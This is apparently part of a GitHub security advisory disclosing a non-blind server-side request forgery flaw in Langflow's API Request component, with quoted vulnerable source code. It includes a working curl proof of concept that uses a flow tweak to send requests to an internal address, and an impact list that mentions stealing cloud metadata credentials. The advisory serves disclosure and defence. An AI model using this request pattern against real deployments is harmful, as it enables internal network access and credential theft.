+ "details": "**Vulnerability Overview**\n\n\nLangflow provides an API Request component that can issue arbitrary HTTP requests within a flow. This component takes a user-supplied URL, performs only normalization and basic format checks, and then sends the request using a server-side httpx client. It does not block private IP ranges (127.0.0.1, the 10/172/192 ranges) or cloud metadata endpoints (169.254.169.254), and it returns the response body as the result.\n\nBecause the flow execution endpoints (/api/v1/run, /api/v1/run/advanced) can be invoked with just an API key, if an attacker can control the API Request URL in a flow, non-blind SSRF is possible—accessing internal resources from the server’s network context. This enables requests to, and collection of responses from, internal administrative endpoints, metadata services, and internal databases/services, leading to information disclosure and providing a foothold for further attacks.\n\n**Vulnerable Code**\n \n1. When a flow runs, the API Request URL is set via user input or tweaks, or it falls back to the value stored in the node UI.\n \n https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/backend/base/langflow/api/v1/endpoints.py#L349-L359\n \n ```python\n @router.post(\"/run/{flow_id_or_name}\", response_model=None, response_model_exclude_none=True)\n async def simplified_run_flow(\n *,\n background_tasks: BackgroundTasks,\n flow: Annotated[FlowRead | None, Depends(get_flow_by_id_or_endpoint_name)],\n input_request: SimplifiedAPIRequest | None = None,\n stream: bool = False,\n api_key_user: Annotated[UserRead, Depends(api_key_security)],\n context: dict | None = None,\n http_request: Request,\n ):\n ```\n \n https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/backend/base/langflow/api/v1/endpoints.py#L573-L588\n \n ```bash\n @router.post(\n \"/run/advanced/{flow_id_or_name}\",\n response_model=RunResponse,\n response_model_exclude_none=True,\n )\n async def experimental_run_flow(\n *,\n session: DbSession,\n flow: Annotated[Flow, Depends(get_flow_by_id_or_endpoint_name)],\n inputs: list[InputValueRequest] | None = None,\n outputs: list[str] | None = None,\n tweaks: Annotated[Tweaks | None, Body(embed=True)] = None,\n stream: Annotated[bool, Body(embed=True)] = False,\n session_id: Annotated[None | str, Body(embed=True)] = None,\n api_key_user: Annotated[UserRead, Depends(api_key_security)],\n ) -> RunResponse:\n ```\n \n2. Normalization/validation stage: It only checks that the URL is non-empty and well-formed. No blocking of private networks, localhost, or IMDS.\n \n https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/api_request.py#L280-L289\n \n ```python\n def _normalize_url(self, url: str) -> str:\n \"\"\"Normalize URL by adding https:// if no protocol is specified.\"\"\"\n if not url or not isinstance(url, str):\n msg = \"URL cannot be empty\"\n raise ValueError(msg)\n \n url = url.strip()\n if url.startswith((\"http://\", \"https://\")):\n return url\n return f\"https://{url}\"\n ```\n \n https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/api_request.py#L433-L438\n \n ```python\n url = self._normalize_url(url)\n \n # Validate URL\n if not validators.url(url):\n msg = f\"Invalid URL provided: {url}\"\n raise ValueError(msg)\n ```\n \n3. On the server side, it sends a request to an arbitrary URL using httpx.AsyncClient and exposes the response body as metadata[\"result\"].\n \n https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/api_request.py#L312-L322\n \n ```python\n try:\n # Prepare request parameters\n request_params = {\n \"method\": method,\n \"url\": url,\n \"headers\": headers,\n \"json\": processed_body,\n \"timeout\": timeout,\n \"follow_redirects\": follow_redirects,\n }\n response = await client.request(**request_params)\n ```\n \n https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/api_request.py#L335-L340\n \n ```python\n # Base metadata\n metadata = {\n \"source\": url,\n \"status_code\": response.status_code,\n \"response_headers\": response_headers,\n }\n ```\n \n https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/api_request.py#L364-L379\n \n ```python\n # Handle response content\n if is_binary:\n result = response.content\n else:\n try:\n result = response.json()\n except json.JSONDecodeError:\n self.log(\"Failed to decode JSON response\")\n result = response.text.encode(\"utf-8\")\n \n metadata[\"result\"] = result\n \n if include_httpx_metadata:\n metadata.update({\"headers\": headers})\n \n return Data(data=metadata)\n ```\n \n\n### PoC\n\n---\n\n**PoC Description**\n \n- I launched a Langflow server using the latest `langflowai/langflow:latest` Docker container, and a separate container `internal-api` that exposes an internal-only endpoint `/internal` on port 8000. Both containers were attached to the same user-defined network (`ssrf-net`), allowing communication by name or via the IP 172.18.0.3.\n- I added an API Request node to a Langflow flow and set the URL to the internal service (`http://172.18.0.3:8000/internal`). Then I invoked `/api/v1/run/advanced/<FLOW_ID>` with an API key to perform SSRF. The response returned the internal service’s body in the `result` field, confirming non-blind SSRF.\n\n**PoC**\n\n- Langflow Setting\n \n <img width=\"1917\" height=\"940\" alt=\"image\" src=\"https://github.com/user-attachments/assets/96b0d770-b260-440f-9205-1583c108e12f\" />\n \n- Exploit\n \n ```bash\n curl -s -X POST 'http://localhost:7860/api/v1/run/advanced/0b7f7713-d88c-4f92-bcf8-0dafe250ea9d' \\\n -H 'Content-Type: application/json' \\\n -H 'x-api-key: sk-HHc93OjH_4ep_EhfWrweP1IwpooJ3ZZnYOu-HgqJV4M' \\\n --data-raw '{\n \"inputs\":[{\"components\":[],\"input_value\":\"\"}],\n \"outputs\":[\"Chat Output\"],\n \"tweaks\":{\"API Request\":{\"url_input\":\"http://172.18.0.3:8000/internal\",\"include_httpx_metadata\":false}},\n \"stream\":false\n }' | jq -r '.outputs[0].outputs[0].results.message.text | sub(\"^```json\\\\n\";\"\") | sub(\"\\\\n```$\";\"\") | fromjson | .result'\n ```\n \n <img width=\"1918\" height=\"1029\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4883029f-bd56-4c23-b5a3-6f8a84dbcce1\" />\n \n\n### Impact\n\n---\n\n- Scanning internal assets and data exfiltration: Attackers can access internal administrative HTTP endpoints, proxies, metrics dashboards, and management consoles to obtain sensitive information (versions, tokens, configurations).\n- Access to metadata services: In cloud environments, attackers can use 169.254.169.254, etc., to steal instance metadata and credentials.\n- Foothold for attacking internal services: Can forge requests by abusing inter-service trust and become the starting point of an SSRF→RCE chain (e.g., invoking an internal admin API).\n- Non-blind: Because the response body is returned to the client, attackers can immediately view and exploit the collected data.\n- Risk in multi-tenant environments: Bypassing tenant boundaries can cause cross-leakage of internal network information, resulting in high impact. Even in single-tenant setups, the risk remains high depending on internal network policies.",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments